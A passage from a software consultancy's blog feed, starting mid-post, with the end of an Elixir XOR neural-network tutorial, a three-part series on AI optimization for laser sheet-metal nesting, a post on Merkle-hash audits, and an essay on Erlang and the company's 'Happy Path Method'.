    |&amp;gt; Axon.Loop.trainer(:binary_cross_entropy, :sgd)
    |&amp;gt; Axon.Loop.run(data, %{}, epochs: epochs, iterations: 1000, compiler: EXLA)
  end

  def run do
    model = build_model({nil, 1}, {nil, 1})
    data = Stream.repeatedly(&amp;amp;batch/0)

    model_state = train_model(model, data, 10)

    IO.inspect(
      Axon.predict(model, model_state, %{&amp;quot;x1&amp;quot; =&amp;gt; Nx.tensor([[0]]), &amp;quot;x2&amp;quot; =&amp;gt; Nx.tensor([[1]])})
    )
  end

end

XOR.run()
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id=&quot;wrapping-up&quot; tabindex=&quot;-1&quot;&gt;Wrapping Up&lt;/h2&gt;
&lt;p&gt;After running the model, I got the following output:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-elixir&quot;&gt;18:39:39.689 [debug] Forwarding options: [compiler: EXLA] to JIT compiler

18:39:39.729 [info] TfrtCpuClient created.
Epoch: 0, Batch: 950, loss: 0.6493790
Epoch: 1, Batch: 950, loss: 0.5824046
Epoch: 2, Batch: 950, loss: 0.5003822
Epoch: 3, Batch: 950, loss: 0.4245099
Epoch: 4, Batch: 950, loss: 0.3641715
Epoch: 5, Batch: 950, loss: 0.3175022
Epoch: 6, Batch: 950, loss: 0.2810990
Epoch: 7, Batch: 950, loss: 0.2520537
Epoch: 8, Batch: 950, loss: 0.2284686
Epoch: 9, Batch: 950, loss: 0.2089621
#Nx.Tensor&amp;lt;
  f32[1][1]
  EXLA.Backend&amp;lt;host:0, 0.3871477933.15073302.157805&amp;gt;
  [
    [0.9698225259780884]
  ]
&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The model successfully learned the XOR function and was able to predict the output for the inputs &lt;code&gt;[0]&lt;/code&gt; and &lt;code&gt;[1]&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;It&#39;s so nice not to have to use Python for writing and running a model!&lt;/p&gt;
&lt;p&gt;Today was a productive day, full of learning and exploration. I&#39;m excited to continue my journey into the world of neural networks with Elixir.&lt;/p&gt;
&lt;p&gt;Next, I will see if I can get CUDA to work so I can use my NVIDIA 3090 card for something useful...&lt;/p&gt;
&lt;p&gt;... but that&#39;s a story for another day.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>AI Laser Metal Cutting - Part 3</title>
    <link href="https://happihacking.com/blog/posts/2023/2dpacking-3/"/>
    <updated>2023-06-16T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/2dpacking-3/</id>
    <summary>Replacing humans by AI optimization as a service</summary>
    <content type="html">&lt;h2 id=&quot;the-optimizer-part-3&quot; tabindex=&quot;-1&quot;&gt;The Optimizer - part 3&lt;/h2&gt;
&lt;p&gt;Timeline: 2009-2020. Potentially reducing CO2 globally by 1%.&lt;/p&gt;
&lt;h2 id=&quot;cutting-plan-optimization-as-a-service&quot; tabindex=&quot;-1&quot;&gt;Cutting plan optimization as a service&lt;/h2&gt;
&lt;p&gt;There are some interesting challenges involved when automatically and non-interactively creating cutting plans for humans to accept. Some are related to how we optimize, others are related to how customers think and feel.&lt;/p&gt;
&lt;p&gt;To mention but a few challenges:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;What constitutes a &amp;quot;good&amp;quot; cutting plan? Humans are not logical creatures; minimal cost may not be good enough, it also has to &amp;quot;look good&amp;quot;.&lt;/li&gt;
&lt;li&gt;Providing cutting plan optimization as a service puts additional constraints on delivering production-safe cutting plans.&lt;/li&gt;
&lt;li&gt;How do you properly sort multidimensional values? A weighted sum is not the way.&lt;/li&gt;
&lt;li&gt;How do you break the optimization problem down into smaller parts?&lt;/li&gt;
&lt;/ul&gt;
&lt;img class=&quot;img-blog-smaller&quot; src=&quot;https://happihacking.com/images/2d-packing-3.png&quot; alt=&quot;Image generated by DALL-E&quot; title=&quot;Image generated by DALL-E&quot; /&gt;
&lt;p&gt;If we produce a chaotic-looking plan that has 10% lower cost than an organized plan that looks like it makes sense, you can be sure the human operator will reject the chaotic plan. They simply believe the risk of breaking the laser machine&#39;s cutting head is too high (even though we know it is safe). A production standstill is very costly. Convincing them is not really an option, so one has to try to produce a cutting plan that looks good, for some definition of &amp;quot;looks good&amp;quot;.&lt;/p&gt;
&lt;p&gt;Multidimensional sorting is a concept that is useful in many cases. The basic idea is to group values based on some defined epsilon-function per dimension, recursively. This way you can express things like: solutions A and B are close enough in the number of parts placed to belong to the same group with regard to that dimension, but B has e.g. a better cutting path, so B possibly comes before A since B has a lower cutting-path cost. This is the way. It is also awesome for debugging.&lt;/p&gt;
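To make the idea concrete, here is a minimal sketch in Python (the solution data and epsilon values are made up for illustration): quantizing each dimension by its epsilon turns the recursive grouping into a lexicographic sort, where near-equal values in one dimension fall into the same group and later dimensions break ties.

```python
def epsilon_key(value, epsilons):
    # Quantize each dimension by its epsilon so near-equal values land
    # in the same group; subsequent dimensions then break the ties.
    return tuple(round(v / eps) for v, eps in zip(value, epsilons))

# Hypothetical solutions as (negated parts placed, cutting-path cost);
# negation makes "more parts placed" sort first.
solutions = {
    "A": (-20, 137.2),  # 20 parts placed, path cost 137.2
    "B": (-20, 121.9),  # same parts placed, cheaper path
    "C": (-19, 100.0),  # fewer parts placed
}

# Group parts-placed exactly (epsilon 1), path cost in steps of 5.
ranked = sorted(solutions, key=lambda s: epsilon_key(solutions[s], (1, 5.0)))
print(ranked)  # ['B', 'A', 'C']
```

B sorts before A because both are in the same parts-placed group and B has the better cutting path; C comes last because it placed fewer parts, no matter how cheap its path is.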
&lt;p&gt;On the topic of ordering things, we can easily imagine several measures for evaluating different properties of parts and clusters. For example, area-utility: a simple enough idea, and one that seems meaningful. How much of the bounding-box area is covered by a part&#39;s area? Even such simple things have funny properties; for instance, this measure can be interpreted as saying a circle is 78.54% square. One must take care to use the proper measures at the proper time and place and not draw the wrong conclusions. Indeed, circles and squares are very different when packing.&lt;/p&gt;
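The circle figure is plain geometry: a circle of radius r covers π·r² of its 2r-by-2r bounding box, i.e. π/4 of it. A quick check:

```python
import math

# Area-utility: fraction of the bounding box covered by the part.
# For a circle of radius r, the bounding box is a 2r x 2r square.
r = 1.0
area_utility = (math.pi * r**2) / (2 * r) ** 2  # = pi / 4
print(f"{area_utility:.2%}")  # 78.54%
```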
&lt;p&gt;Our approach to solving the extra-everything 2D-packing problem was to sort of do what humans do, only better, and in a cold, hard computer way. To this end we created many clever algorithms for creating pairs of parts, clusters of parts, expandable patterns, columns and rows, lattices and more. We also created advanced algorithms for splitting large clusters (sometimes you must break things), and specialized algorithms to fill empty areas such as holes. On top of that, we optimized in phases to place larger parts over multiple sheets, and so forth.&lt;/p&gt;
&lt;p&gt;At the core of it all sits a fundamental, practical representation of parts and how they interact with other parts, allowing us to reason about them logically; a geometry constraint engine; a very reliable, high-precision no-fit-polygon algorithm; and a cutting-path optimizer with its own set of constraints.
The result: we could produce cutting plans that far exceed normal nesting in performance, are more production-reliable than cutting plans made by humans, and in practice replace the human as the nesting controller. This is a huge benefit to the industry.&lt;/p&gt;
&lt;p&gt;In the end, due to Tomologic&#39;s patents being considered too general, some of Tomologic&#39;s ideas on clustering have spread and are now used by some of the more competent nesting software packages, although I imagine no other company has the same rigorous checks to guarantee production safety. Thanks to our groundbreaking know-how, algorithms, and our unique way of regarding the 2D Nesting problem, Tomologic has contributed greatly to the reduction of CO2 in the metal cutting industry. I still believe that The Optimizer is the best fully-automatic, production-safe AI service for 2D packing in metal sheet cutting.&lt;/p&gt;
&lt;p&gt;To paraphrase Zlatan: Dear World - you&#39;re welcome.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>AI Laser Metal Cutting - Part 2</title>
    <link href="https://happihacking.com/blog/posts/2023/2dpacking-2/"/>
    <updated>2023-06-15T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/2dpacking-2/</id>
    <summary>Replacing humans by AI optimization as a service</summary>
    <content type="html">&lt;h2 id=&quot;the-optimizer-part-2&quot; tabindex=&quot;-1&quot;&gt;The Optimizer - part 2&lt;/h2&gt;
&lt;p&gt;Timeline: 2009-2020. Potentially reducing CO2 globally by 1%.&lt;/p&gt;
&lt;h2 id=&quot;2d-packing-extra-everything&quot; tabindex=&quot;-1&quot;&gt;2D packing - extra everything&lt;/h2&gt;
&lt;p&gt;Let&#39;s dive into the specifics. 2D packing, what is the actual problem we aim to solve?&lt;/p&gt;
&lt;p&gt;For simplicity, assume we have 20 unique irregular polygons (without holes) of various shapes and sizes that all fit together on a single sheet with room to spare. Also, let&#39;s disallow rotations and flips, and assume we use a greedy left-bottom placement strategy; there are then 20! (20! = 20•19•18•...•1) ways to place these polygons (if we include symmetrical solutions). Each solution will result in some amount of waste, and typically the goal is to produce as short a &lt;em&gt;horizon&lt;/em&gt; as possible, since after making a cut at the horizon there may be a usable part of the sheet left over to use down the line. You can naturally have both vertical and horizontal horizons, but that is just more of the same.&lt;/p&gt;
&lt;p&gt;There is no reasonable approach that will let us place and evaluate all 20! orders of parts; this is why this is a hard problem (adding one more part makes the problem 21 times bigger). A typical packing problem could easily have hundreds of unique parts with up to thousands of copies each, resulting in a huge number of parts to be placed. This is why all software employs heuristic approaches when trying to solve these problems.&lt;/p&gt;
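The factorial growth is easy to verify: 20! is already on the order of 10^18, and each additional part multiplies the number of placement orders again.

```python
import math

# Number of placement orders for 20 parts (rotations/flips disallowed):
print(math.factorial(20))  # 2432902008176640000, roughly 2.4 * 10^18

# Adding one more part multiplies the search space by 21:
print(math.factorial(21) // math.factorial(20))  # 21
```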
&lt;p&gt;Now, imagine allowing flips and rotations, and optimizing over multiple sheets. Fun!&lt;/p&gt;
&lt;img class=&quot;img-blog-smaller&quot; src=&quot;https://happihacking.com/images/2d-packing-2.png&quot; alt=&quot;Image generated by DALL-E&quot; title=&quot;Image generated by DALL-E&quot; /&gt;
&lt;p&gt;At Tomologic we had a fundamentally different approach compared to 2D Nesting at the time. The core idea is to reduce waste and cutting time as much as possible. We achieved this by incorporating some brilliant insights and knowledge of the cutting process from the founder of Tomologic, a long-time laser machine operator who invented some brilliant methods for controlling heat conduction and cut-part stability. Basically, we took his know-how and created algorithms to make it automatic and systematic: a knowledge-based AI system.&lt;/p&gt;
&lt;p&gt;We removed assumption 1 (place parts individually) and 2 (cut parts independently) which, together with our proprietary cutting patterns, allowed us to create clusters of almost any shapes. Our algorithms and valuation models allowed us to compute an estimated multidimensional &lt;em&gt;cost&lt;/em&gt; for a particular cluster of parts, taking into account how it needs to be split and cut to guarantee production safety without all that waste. The revolutionizing idea lies in our algorithms for controlling how heat spreads through the metal sheet and how to keep parts from moving and tilting during the cutting process, and taking this into account when creating the packing and cutting paths.&lt;/p&gt;
&lt;p&gt;Thus we created an even more complicated 2D packing problem, where the cutting path is part of the packing problem and the &lt;em&gt;cost&lt;/em&gt; of cutting a cluster of parts depends on where on the sheet it is placed since location impacts how to cut. This interdependency makes it so much harder.
In addition to this, by removing assumption 1 and 2, we are also faced with a precision problem that traditional Nesting does not have - since we are cutting clusters of parts, we need to guarantee the cut parts are within acceptable tolerances when measured. When making a cut between two parts (not simply straight lines), this puts additional complexity on placement algorithms. Even when we do use safety distances, these are also optimized based on the characteristics of adjacent parts or clusters. We also needed a clever constraint engine to handle how parts interact and produce &lt;em&gt;pockets&lt;/em&gt; of waste between them.&lt;/p&gt;
&lt;p&gt;To make it better (and harder) we also allowed free rotations, where most Nesting software allows rotations only in discrete increments (e.g. 5 degrees). This basically makes our search space infinite, at least in theory; in a practical implementation, rotations are limited by the precision of 64-bit floating point numbers.&lt;/p&gt;
&lt;p&gt;So, how does one get any results at all given this daunting scope? You need a great team, a dash of creativity, and a lot of hard work.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>AI Laser Metal Cutting - Part 1</title>
    <link href="https://happihacking.com/blog/posts/2023/2dpacking-1/"/>
    <updated>2023-06-14T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/2dpacking-1/</id>
    <summary>Replacing humans by AI optimization as a service</summary>
    <content type="html">&lt;h2 id=&quot;the-optimizer-part-1&quot; tabindex=&quot;-1&quot;&gt;The Optimizer - part 1&lt;/h2&gt;
&lt;p&gt;Timeline: 2009-2020. Potentially reducing CO2 globally by 1%.&lt;/p&gt;
&lt;h2 id=&quot;intro&quot; tabindex=&quot;-1&quot;&gt;Intro&lt;/h2&gt;
&lt;p&gt;&amp;quot;We made an AI and attached it to a 6kW laser cutting machine!&amp;quot; ;).&lt;/p&gt;
&lt;p&gt;On a more serious note. Discrete optimization problems are ubiquitous and you will find them in many domains. Laser cutting of sheet metal is no exception. Sheet metal cutting is a crucial part of the multi-billion-dollar metalworking industry, serving various sectors like automotive, aerospace, construction, electronics, and more. It&#39;s used for producing parts such as car body panels, aircraft components, building facades, electronic casings, and countless other metal parts. The optimization of this process is crucial, given the industry&#39;s size, to save on costs and reduce waste. Specifically the optimization of the placement of parts to be cut, on one or more sheets, is the problem we will touch on in these posts.&lt;/p&gt;
&lt;h2 id=&quot;2d-nesting&quot; tabindex=&quot;-1&quot;&gt;2D Nesting&lt;/h2&gt;
&lt;p&gt;The &lt;em&gt;Nesting Problem&lt;/em&gt; in sheet metal cutting is similar to arranging as many gingerbread cookies as possible onto a baking sheet without any overlap, aiming to utilize the entire surface. Each cookie represents a part to be cut from the sheet, and the goal is to minimize the leftover or wasted dough (the unused metal), while fitting all the desired cookie shapes (metal parts). This is a complex task that involves deciding the best layout of the &amp;quot;cookies&amp;quot; to minimize waste.&lt;/p&gt;
&lt;img class=&quot;img-blog-smaller&quot; src=&quot;https://happihacking.com/images/2d-packing-1.png&quot; alt=&quot;Image generated by DALL-E&quot; title=&quot;Image generated by DALL-E&quot; /&gt;
&lt;p&gt;The Nesting Problem is a type of 2D packing problem, a combinatorial (discrete) optimization problem. The problem becomes increasingly complex as the number of different parts and sizes increases. Solving this problem efficiently can lead to significant cost savings, by minimizing waste and maximizing the usage of raw materials. It also reduces the environmental impact by minimizing scrap metal.&lt;/p&gt;
&lt;p&gt;The problem is further complicated by issues such as heat expanding the metal sheet, customers having requirements on the rotations and flipping of parts, and avoiding risks such as a part tilting and potentially destroying the cutting head causing expensive production outages. The side constraints are many and not always obvious.&lt;/p&gt;
&lt;p&gt;Parts can also contain empty areas, or &lt;em&gt;holes&lt;/em&gt;, inside the outer geometry that also can be used for placing smaller parts. Parts can generally have any rotation or flip transformation unless specifically disallowed.&lt;/p&gt;
&lt;p&gt;This results in a truly mind-boggling search space, and not surprisingly this is one of the hardest problems in computer science, an NP-hard problem. Such fun!&lt;/p&gt;
&lt;p&gt;Various algorithms and heuristics are used to tackle this problem, like the bottom-left placement algorithm, the best-fit algorithm, and metaheuristics such as Local Search, Simulated Annealing, Genetic Algorithms, and many many more. In practice, one often seeks a good-enough solution that significantly reduces waste, even if it isn&#39;t the optimal solution.&lt;/p&gt;
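As an illustration only, here is a toy greedy bottom-left placement in Python, simplified to axis-aligned rectangles on a fixed-width sheet; real nesting handles irregular polygons, rotations, and the many side constraints discussed above. All dimensions are made up.

```python
SHEET_W = 10.0  # sheet width; height is treated as unbounded (strip packing)

def overlaps(a, b):
    # Axis-aligned rectangle overlap test; rects are (x, y, w, h).
    ax, ay, aw, ah = a
    bx, by, bw, bh = b
    return ax < bx + bw and bx < ax + aw and ay < by + bh and by < ay + ah

def bottom_left(parts):
    placed = []
    for w, h in parts:
        # Candidate positions: the origin, plus the right and top
        # corners of every already-placed rectangle.
        candidates = [(0.0, 0.0)]
        for px, py, pw, ph in placed:
            candidates += [(px + pw, py), (px, py + ph)]
        # Keep candidates that fit the sheet width and overlap nothing.
        feasible = [
            (x, y) for x, y in candidates
            if x + w <= SHEET_W
            and all(not overlaps((x, y, w, h), p) for p in placed)
        ]
        # Lowest position first, leftmost as tie-breaker (assumes every
        # part fits somewhere; a real nester needs a fallback).
        x, y = min(feasible, key=lambda c: (c[1], c[0]))
        placed.append((x, y, w, h))
    return placed

layout = bottom_left([(4, 2), (4, 2), (4, 2)])
print(layout)  # two parts side by side on the bottom, the third on top
```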
&lt;p&gt;During my time at Tomologic, I was fortunate to work with these very interesting and fun challenges, which often gave rise to equally interesting and often hard, or at least tricky, sub-problems; very rarely did anyone on the team go: &amp;quot;Well, that was easy!&amp;quot;&lt;/p&gt;
&lt;h2 id=&quot;2d-nesting-pre-tomologic&quot; tabindex=&quot;-1&quot;&gt;2D Nesting pre-Tomologic&lt;/h2&gt;
&lt;p&gt;After that brief introduction to Nesting, let&#39;s get into the actual issue at hand.
Nesting, as it was (is?) used in the industry, produces an uncomfortable amount of waste due to some simplifications that are introduced to &amp;quot;solve&amp;quot; certain production requirements.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Assumption 1&lt;/strong&gt;: Place parts individually. This is achieved by introducing a safety distance around each part. This ensures that parts do not get in the way of the cutting head, since that may cause damage to it, which would cause a production interruption associated with a high cost. This is incidentally also the root of the waste problem.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Assumption 2&lt;/strong&gt;: Cut parts independently. The cutting path (how to move the laser cutting head), is basically just solving a (also NP-hard) Traveling Salesman Problem for each sheet since each part can be cut individually. There are naturally exceptions. Fun fact: when cutting many small parts you may actually want to cut in a way as to spread out the heat as much as possible, that is, not the shortest path.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These two simplifications allow the algorithms to use significant simplifications on how geometries are represented, and how the placement of parts is performed. Combined, this significantly reduces the computational effort needed to explore the search space.&lt;/p&gt;
&lt;p&gt;In the next two parts, I will talk more about Tomologic&#39;s view of Nesting and how we solved a more involved problem to achieve up to 50% reduction in waste material and up to 30% reduction in cutting time.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Audits through Merkle Root Hashes</title>
    <link href="https://happihacking.com/blog/posts/2023/blockchain-audit/"/>
    <updated>2023-06-09T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/blockchain-audit/</id>
    <summary>Blockchain - The good parts</summary>
    <content type="html">&lt;h2 id=&quot;when-in-doubt-sell-shovels&quot; tabindex=&quot;-1&quot;&gt;When in doubt, sell shovels!&lt;/h2&gt;
&lt;p&gt;They say that during the gold rush only people who sold shovels made a fortune. We at Happi Hacking
spent some time in the world of blockchains, learning how to build some pretty solid shovels. We
took part in developing a blockchain (aeternity) from scratch, including a smart contract language
(Sophia), a VM (&lt;a href=&quot;https://happihacking.com/blog/posts/2023/fate/&quot;&gt;FATE&lt;/a&gt;), and all other infrastructure needed for running a public blockchain.&lt;/p&gt;
&lt;h2 id=&quot;so-where-should-we-dig&quot; tabindex=&quot;-1&quot;&gt;So, where should we dig?&lt;/h2&gt;
&lt;p&gt;The underlying math and cryptography used for blockchains are pretty solid. The foundation didn&#39;t
originate in the blockchain world. Blockchain technology is merely an application of algorithms that
can be found elsewhere in cryptography, for example in SSL/TLS where it is used for encrypting
internet traffic (the padlock in your browser). It is also used in GIT, in distributed databases
etc.&lt;/p&gt;
&lt;h2 id=&quot;merkle-tries-at-a-glance&quot; tabindex=&quot;-1&quot;&gt;Merkle tries at a glance&lt;/h2&gt;
&lt;p&gt;We implemented Patricia Merkle Tries for æternity, and I personally got a bit of a crush on this
data structure. I won&#39;t even try to explain how they work, but for this story the important bit is
that the contents of a Merkle trie can be represented by its Merkle hash (or root hash) in a way
that is infeasible to fake (because of cryptography). The Merkle trie can in turn contain a huge
amount of data, making the root hash represent all this data.&lt;/p&gt;
&lt;p&gt;One way of thinking about a blockchain is as a distributed database whose state is represented
by the root hash of its content along with the history of transactions. The only way of changing the
state of this database is to add blocks of transactions to it, yielding a new root hash
that represents the new state and the new history. This is not the whole truth, but it is a
reasonable abstraction.&lt;/p&gt;
&lt;h2 id=&quot;merkle-tries-and-accounts&quot; tabindex=&quot;-1&quot;&gt;Merkle tries and accounts&lt;/h2&gt;
&lt;p&gt;So what is the content of the database? This is up to the blockchain, but in the case of crypto
currencies, there will be balances in some representation included in the database. Are there other
domains where this setup is applicable? Obviously in banks, but also for ledgers in accounting.&lt;/p&gt;
&lt;h2 id=&quot;accountability-and-audits&quot; tabindex=&quot;-1&quot;&gt;Accountability and audits&lt;/h2&gt;
&lt;p&gt;Imagine that a company stores all its customer-related transactions in a Merkle trie. It is not
necessary to use this trie as the actual database for the application, e.g., if it becomes too slow
for operational purposes, but as crucial events happen (e.g., Alice sends Bob some money) the
events could be imported into the Merkle trie, yielding a new root hash.&lt;/p&gt;
&lt;p&gt;It is a property of Merkle hashes that they do not expose the content of the trie, unless
you happen to guess the content of the entire trie. This means that the root hashes can be published
to authorities, customers, or even the general public, without exposing the actual balances.&lt;/p&gt;
&lt;p&gt;So, what good is publishing the Merkle hashes if it doesn&#39;t tell us what is in the database?&lt;/p&gt;
&lt;h2 id=&quot;proof-of-inclusion&quot; tabindex=&quot;-1&quot;&gt;Proof of Inclusion&lt;/h2&gt;
&lt;p&gt;A proof of inclusion is a cryptographically safe way of proving that some part of the Merkle trie
looks in a certain way given a specific Merkle hash. For example, given a root hash, you can provide
a proof of inclusion that shows that a specific account had a certain balance in the underlying
Merkle trie. And this without exposing the balances of any other account.&lt;/p&gt;
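&lt;p&gt;To make this concrete, here is a minimal sketch in Python of a binary Merkle tree with proofs of inclusion. It is illustrative only: real blockchains use more elaborate trie structures, domain-separated hashing, and canonical serialization, and the account encoding (e.g., &lt;code&gt;alice:100&lt;/code&gt;) is invented for the example.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
```python
import hashlib

def h(data):
    return hashlib.sha256(data).digest()

def merkle_root(leaves):
    """Fold a list of leaves up to a single root hash."""
    level = [h(leaf) for leaf in leaves]
    while len(level) > 1:
        if len(level) % 2 == 1:      # duplicate the last node on odd levels
            level.append(level[-1])
        level = [h(level[i] + level[i + 1]) for i in range(0, len(level), 2)]
    return level[0]

def inclusion_proof(leaves, index):
    """Collect the sibling hashes needed to recompute the root from one leaf."""
    level = [h(leaf) for leaf in leaves]
    proof = []
    while len(level) > 1:
        if len(level) % 2 == 1:
            level.append(level[-1])
        sibling = index ^ 1          # the paired node at this level
        proof.append((index % 2, level[sibling]))
        level = [h(level[i] + level[i + 1]) for i in range(0, len(level), 2)]
        index //= 2
    return proof

def verify(leaf, proof, root):
    """Recompute the root from a single leaf and its proof path."""
    acc = h(leaf)
    for is_right, sibling in proof:
        acc = h(sibling + acc) if is_right else h(acc + sibling)
    return acc == root

leaves = [b"alice:100", b"bob:250", b"carol:75", b"dave:10"]
root = merkle_root(leaves)
proof = inclusion_proof(leaves, 1)   # prove bob's balance
assert verify(b"bob:250", proof, root)
```
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Given only the published root hash and a two-hash proof, anyone can check Bob&#39;s balance without learning anything about the other leaves.&lt;/p&gt;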
&lt;p&gt;If an external entity collects the published root hashes, they can be used in a later audit to
follow flows of money between specific accounts without compromising the privacy of other account
holders. And since the root hashes were published at the time they were constructed, there is no
way for the auditee to rewrite the history of its database.&lt;/p&gt;
&lt;h2 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;While public blockchains in general might or might not have a future, the underlying technology is
alive and kicking. We have hinted at one solid use case, but there are others. To name a few:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Chain of custody applications&lt;/li&gt;
&lt;li&gt;Auditing election results&lt;/li&gt;
&lt;li&gt;Origin tracking of natural resources&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If this blog post gave you some ideas, go ahead and contact us. We are always ready to build some new shovels!&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>It is never about technology - until it is</title>
    <link href="https://happihacking.com/blog/posts/2023/its_not_technology/"/>
    <updated>2023-06-06T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2023/its_not_technology/</id>
    <summary>Then it is Erlang</summary>
    <content type="html">&lt;div style=&quot;width: 98%; text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/water_and_sky.jpg&quot; alt=&quot;A calm sea at sunset.&quot; style=&quot;width: 100%; object-fit: contain;&quot; title=&quot;A calm sea at sunset.&quot; /&gt; &lt;/div&gt;
&lt;p&gt;In software development, there&#39;s a saying that I&#39;ve come to appreciate:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;It&#39;s never about technology - until it is.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;It&#39;s a bit of a riddle, a paradox that seems to contradict itself. But as you delve deeper into the world of code, systems, and digital solutions, you&#39;ll find that this statement holds a profound truth.&lt;/p&gt;
&lt;p&gt;Let&#39;s break it down.&lt;/p&gt;
&lt;p&gt;When we say &#39;It&#39;s never about technology&#39;, we&#39;re acknowledging that at the heart of every software solution, every app, and every digital tool, we&#39;re trying to solve a human problem. We&#39;re not just writing code for the sake of writing code. We&#39;re creating solutions to make people&#39;s lives easier, to streamline processes, to bring joy, or to connect people. Technology is not the end goal; it&#39;s the means to an end.&lt;/p&gt;
&lt;p&gt;But then we say, &#39;until it is&#39;. This is where the paradox comes in. While our ultimate goal is to solve human problems, we can&#39;t ignore the technology itself. The tools we use, the systems we design, the code we write - they all matter. They&#39;re the vehicle that carries our solutions from concept to reality. And if that vehicle isn&#39;t built well, it won&#39;t get us where we need to go.&lt;/p&gt;
&lt;p&gt;Let&#39;s look at two real-world examples. First, take Klarna, a Swedish fintech company that had a simple idea: bring trust to e-commerce by providing a buy-now-pay-later service. (I wrote more about the &lt;a href=&quot;https://happihacking.com/blog/posts/2023/Installment_plans/&quot;&gt;Klarna installment plans project&lt;/a&gt; separately.) This idea wasn&#39;t about technology; it was about solving a problem. Merchants worried about getting paid, and customers worried about receiving what they ordered. Klarna&#39;s solution addressed both concerns in a very simple way: include a paper invoice in the delivery.&lt;/p&gt;
&lt;p&gt;As Klarna grew they needed to handle an increasing number of transactions, maintain a robust service and deliver features quickly. That&#39;s where technology came into play. Fortunately, Klarna had chosen Erlang as the main technology for their online payment system.&lt;/p&gt;
&lt;p&gt;Erlang allowed Klarna to rapidly prototype and test new features, thanks to its functional programming paradigm. It also provided robustness and scalability, critical for a company handling billions in payments. Klarna&#39;s success story isn&#39;t just about a great business idea; it&#39;s also about choosing the right technology to execute that idea.&lt;/p&gt;
&lt;p&gt;Our other example is WhatsApp. It wasn&#39;t about groundbreaking technology; it was about providing a simple, reliable, and user-friendly platform for people to connect. And connect they did, in the billions!&lt;/p&gt;
&lt;p&gt;WhatsApp had also wisely chosen Erlang to implement its secure messaging service. Erlang was the unsung hero, working tirelessly behind the scenes to ensure that every &#39;hello&#39;, every &#39;happy birthday&#39;, and every &#39;I love you&#39; was delivered without a hitch. It allowed WhatsApp to manage billions of messages with a relatively small team of engineers, a feat that was nothing short of miraculous.&lt;/p&gt;
&lt;p&gt;Erlang&#39;s functional programming paradigm allowed WhatsApp to rapidly prototype and test new features. It also provided the robustness and scalability needed to handle an ever-growing number of messages. WhatsApp&#39;s success story isn&#39;t just about a great business idea; it&#39;s also about choosing the right technology to execute that idea.&lt;/p&gt;
&lt;div style=&quot;width: 98%; text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/people_working.jpg&quot; alt=&quot;A table and people hands one holding a phone.&quot; style=&quot;width: 100%; object-fit: contain;&quot; title=&quot;A table and people hands one holding a phone.&quot; /&gt; &lt;/div&gt;
&lt;p&gt;Let&#39;s not forget the unsung heroes - the people. People are the lifeblood of any organization. They are the ones who breathe life into technology, turning cold, hard code into vibrant, dynamic solutions. At HappiHacking, we&#39;re all about people. We believe that the right people, armed with the right tools, can create magic. And by magic, we mean robust, scalable, and efficient solutions that drive business growth.&lt;/p&gt;
&lt;p&gt;But here&#39;s the challenge - how do we strike the perfect balance? How do we ensure that our focus on people doesn&#39;t overshadow the importance of business value or the role of technology? This is where we need a guiding principle, a compass to navigate the delicate balance between these crucial elements.&lt;/p&gt;
&lt;p&gt;That is where the &lt;a href=&quot;https://happihacking.com/blog/posts/2023/the_happy_path/&quot;&gt;Happy Path Method&lt;/a&gt; comes in. It focuses on the positive outcomes, the &#39;happy paths&#39;, rather than getting bogged down by every possible thing that could go wrong. It&#39;s about fostering a positive mindset and creating solutions that work. It&#39;s about making the journey toward the solution as enjoyable as reaching the destination itself. And trust me, it&#39;s a game-changer!&lt;/p&gt;
&lt;p&gt;The Happy Path Method is a unique approach that, contrary to its name, isn&#39;t about skipping through fields of daisies. It&#39;s a serious, business-focused methodology that emphasizes delivering value above all else. It&#39;s about understanding what success looks like for a business and then charting the most direct path to achieve that success.&lt;/p&gt;
&lt;p&gt;It&#39;s easy to get lost in the weeds of technical details and potential edge cases. While it&#39;s important to consider these factors, they should not overshadow the ultimate goal - delivering value to the business. The Happy Path Method keeps this goal front and center. It&#39;s about identifying the core functionality that will deliver the most value, and focusing on implementing that functionality first and foremost.&lt;/p&gt;
&lt;p&gt;This approach does not ignore potential problems or challenges. Instead, it acknowledges them but does not allow them to derail the development process. It&#39;s about maintaining a positive, solution-oriented mindset. It&#39;s about saying, &#39;Yes, we will likely encounter challenges along the way, but let&#39;s not allow those challenges to distract us from our primary goal.&#39;&lt;/p&gt;
&lt;p&gt;At HappiHacking, we&#39;ve embraced the Happy Path Method in our work. We understand that our clients are not just looking for technical expertise; they&#39;re looking for partners who can help them realize their business goals. We focus on understanding our client&#39;s needs, identifying the solutions that will deliver the most value, and then implementing those solutions in the most efficient and effective way possible.&lt;/p&gt;
